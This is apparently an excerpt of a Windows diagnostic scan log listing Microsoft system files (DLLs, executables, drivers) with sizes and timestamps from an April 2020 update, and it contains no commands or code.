2020-04-17 18:08 - 2020-04-17 18:08 - 008013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 007756800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 007017472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 005910016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 004611584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 004129624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 003512320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 002951832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 002800640 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSAT.exe
2020-04-17 18:08 - 2020-04-17 18:08 - 002494744 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 002180408 _____ (Microsoft Corporation) C:\WINDOWS\system32\workfolderssvc.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 001870408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 001610240 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramCompositor.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 001545216 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe
2020-04-17 18:08 - 2020-04-17 18:08 - 001310720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 001264640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2020-04-17 18:08 - 2020-04-17 18:08 - 001151816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 001013000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000983040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000835584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WorkfoldersControl.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000701440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Mirage.Internal.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000686080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000529408 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe
2020-04-17 18:08 - 2020-04-17 18:08 - 000525312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsecedit.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000456192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2020-04-17 18:08 - 2020-04-17 18:08 - 000452096 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpclip.exe
2020-04-17 18:08 - 2020-04-17 18:08 - 000444416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSFlacDecoder.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000420152 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000380416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSFlacDecoder.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000353792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\IndexedDbLegacy.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000225792 _____ (Microsoft Corporation) C:\WINDOWS\system32\WorkFoldersShell.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000187392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iasrad.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srumsvc.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IndexedDbLegacy.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakrathunk.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\system32\WorkFolders.exe
2020-04-17 18:08 - 2020-04-17 18:08 - 000090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\tsgqec.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000070144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tsgqec.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000066048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iasacct.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000050688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srumapi.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000040448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iaspolcy.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimsg.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimsg.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ias.dll
2020-04-17 18:07 - 2020-04-17 18:08 - 022636544 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 014818816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 006523048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 005040640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 004538880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 003753472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 003742544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneCoreUAPCommonProxyStub.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 002800128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2020-04-17 18:07 - 2020-04-17 18:07 - 001835008 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001729024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallService.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001697792 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001665216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001664896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001646048 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001587712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001484384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001477112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001458688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001413840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001397576 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 001368576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wpc.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001368576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001245184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001081856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Vpn.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001077064 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 001055376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001009152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001008128 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000993280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000980832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webservices.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000923136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000912896 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000892416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000868864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windowsperformancerecordercontrol.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000865280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000836608 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000785920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000783480 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 000775696 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 000768528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FlightSettings.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000701440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BTAGService.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000673704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000673464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 000668672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsecedit.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000665088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000647680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000632832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000629760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000628616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2020-04-17 18:07 - 2020-04-17 18:07 - 000538160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000532480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000507152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\taskschd.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000491008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcext.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000487784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000415760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000410112 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000406480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Enumeration.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000381440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntshrui.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000336384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\es.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000330240 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 000324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2020-04-17 18:07 - 2020-04-17 18:07 - 000277864 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 000277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\scecli.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000268008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\iasrad.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000214528 _____ (Microsoft Corporation) C:\WINDOWS\system32\srumsvc.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000214016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scecli.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000211256 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcbloader.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000203264 _____ (Microsoft Corporation) C:\WINDOWS\system32\LanguageComponentsInstaller.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000190048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\logoncli.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000185952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallServiceTasks.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000179712 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000163840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000123952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KerbClientShared.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slc.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000101888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppc.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000093712 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000089336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32u.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dot3api.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dot3msm.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\iasacct.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000084280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2020-04-17 18:07 - 2020-04-17 18:07 - 000071680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Custom.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000066624 _____ (Microsoft Corporation) C:\WINDOWS\system32\iumcrypt.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\srumapi.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000050544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudNotifications.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 000050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\iaspolcy.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000049152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tbauth.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ias.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cmintegrator.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000029184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerCookies.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 000021520 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdhvcom.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000019968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slcext.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000017920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wksprtPS.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsunattend.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 000015872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Custom.ps.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dciman32.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMAlertListener.ProxyStub.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000007680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DMAlertListener.ProxyStub.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimg32.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\lpk.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth9.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth8.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth7.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth6.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth5.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth4.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth3.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth2.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth12.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth11.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth10.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth1.bin
2020-04-17 18:06 - 2020-04-17 18:06 - 009930552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 007604584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 004563200 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 003802624 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 003547648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 002986808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2020-04-17 18:06 - 2020-04-17 18:06 - 002871608 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 002767928 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 002086656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 001999960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 001945600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 001757096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2020-04-17 18:06 - 2020-04-17 18:06 - 001726264 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 001512832 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 001300280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2020-04-17 18:06 - 2020-04-17 18:06 - 001261808 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 001257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 001243648 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 001153024 _____ (Microsoft Corporation) C:\WINDOWS\system32\windowsperformancerecordercontrol.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000982840 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000974336 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000865280 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000822208 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000811320 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000772096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2020-04-17 18:06 - 2020-04-17 18:06 - 000759272 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskschd.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000747320 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000638480 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000618296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000604984 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcasvc.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000561464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2020-04-17 18:06 - 2020-04-17 18:06 - 000530432 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000515600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000513576 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000510792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64win.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000498688 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntshrui.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000477496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2020-04-17 18:06 - 2020-04-17 18:06 - 000465208 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000456504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2020-04-17 18:06 - 2020-04-17 18:06 - 000401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\es.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpr.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000324408 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcommdlg.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000259776 _____ (Microsoft Corporation) C:\WINDOWS\system32\logoncli.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000251704 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
